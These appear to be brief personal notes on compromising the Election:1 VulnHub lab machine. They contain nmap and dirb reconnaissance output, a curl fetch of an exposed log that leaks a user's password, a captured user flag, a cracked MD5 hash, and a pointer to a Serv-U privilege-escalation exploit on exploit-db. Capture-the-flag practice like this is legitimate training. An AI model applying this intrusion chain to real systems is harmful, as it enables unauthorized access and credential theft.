https://resources.infosecinstitute.com/topic/election-1-vulnhub-ctf-walkthrough/



└─$ sudo nmap -sT -A -Pn -n -p- 192.168.110.31
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-22 21:31 CEST
Nmap scan report for 192.168.110.31
Host is up (0.00032s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:95:7F:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.110.31

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds

└─$ dirb http://192.168.110.31  /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | grep -v phpmyadmin
==> DIRECTORY: http://192.168.110.31/election/admin/logs/


└─$ curl http://192.168.110.31/election/admin/logs/system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2021-06-23 01:30:16]  has been logged out from Unknown IP.
[2021-06-23 01:30:29]  has been logged out from Unknown IP.

love@election:~$ cat /home/love/Desktop/user.txt 
cd38ac698c0d793a5236d01003f692b0




bb113886b0513a9d882e3caa5cd73314 ==> https://md5.j4ck.com => Zxc123!@#



/usr/local/Serv-U/Serv-U


https://www.exploit-db.com/exploits/47009